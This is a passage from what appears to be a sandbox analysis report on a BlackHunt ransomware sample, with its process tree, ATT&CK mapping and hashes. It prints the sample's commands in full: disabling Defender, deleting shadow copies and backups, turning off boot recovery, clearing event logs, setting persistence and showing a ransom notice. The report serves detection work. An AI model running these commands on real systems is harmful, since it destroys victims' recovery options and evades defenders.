of 2596 2780 cmd.exe 136 PID 1716 wrote to memory of 2644 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 134 PID 1716 wrote to memory of 2644 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 134 PID 1716 wrote to memory of 2644 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 134 PID 1716 wrote to memory of 2644 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 134 PID 1716 wrote to memory of 3020 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 132 PID 1716 wrote to memory of 3020 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 132 PID 1716 wrote to memory of 3020 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 132 PID 1716 wrote to memory of 3020 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 132 PID 1716 wrote to memory of 3032 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 155 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe"C:\Users\Admin\AppData\Local\Temp\a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1716 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2024
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2736
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2568
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3052
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1536
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2300
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:848
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2524
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1224
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2536
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1744
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1784
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2948
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1400
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:356
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe" /F2⤵PID:900
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2252
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:772
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2244
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1904
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1464
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1608
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1848
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:284
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1584
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2416
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2316
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3060
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2912
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1928
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:3032
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:3020
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2644
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2440
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2600
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2780
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2828
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2940
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2784
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3608
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:3708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:3216
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2792
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe"2⤵
- Deletes itself
PID:4032
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:4040
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3124
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3748
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3716
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3732
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:2896
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:1320
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3720
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1580
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3728
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3888
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3444
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:2780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:3080
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:3564
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:3648
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3472
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:3840
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3284
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:3752
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:2452
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:1484
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:324
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f1⤵PID:448
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:972
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:2988
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe" /F1⤵
- Creates scheduled task(s)
PID:1572
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:2668
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:1000
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:572
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:576
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:1408
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:784
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:328
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f1⤵PID:2072
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:2264
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:1972
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2420
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:2004
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2580
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:1640
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:3056
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:3012
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f1⤵
- Adds Run key to start application
PID:2596
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "487167770-7332201319354458341502686196993458348-85086213516759017301750831245"1⤵PID:2680
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2732
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2892
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2572
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:3032
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1128221281-845995210-1443148596379684301914304066100820639011103703041125149984"1⤵PID:2736
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f1⤵PID:1612
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "218287157-8616637941348267646-1230473070-1419822121570670121-9165711281546320260"1⤵PID:2668
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1344503736-2017491828-12472296411080312992-1914103551-19250809399232655-1889145907"1⤵PID:848
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f1⤵PID:3496
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f1⤵PID:3208
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:2536
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt1⤵PID:3992
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 51⤵
- Runs ping.exe
PID:4072
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3780
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3260
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:2524
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:1888
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3036
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:344
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f1⤵PID:3380
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3420
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F1⤵PID:3644
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3956
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:3148
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1783061820-594925261-14710955341955368214265229693318367808-619655742-600737679"1⤵PID:2988
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\1⤵
- Enumerates connected drives
PID:1644
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:3776
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD558f527025463f31d3516000303e9f88d
SHA1caf3b5cfdcff37b99f83e204ab57edcfdee9e304
SHA256c53d3c3100fd299974b7d4ebf6fde5a9094744fdff3354606db220f83fd54c3f
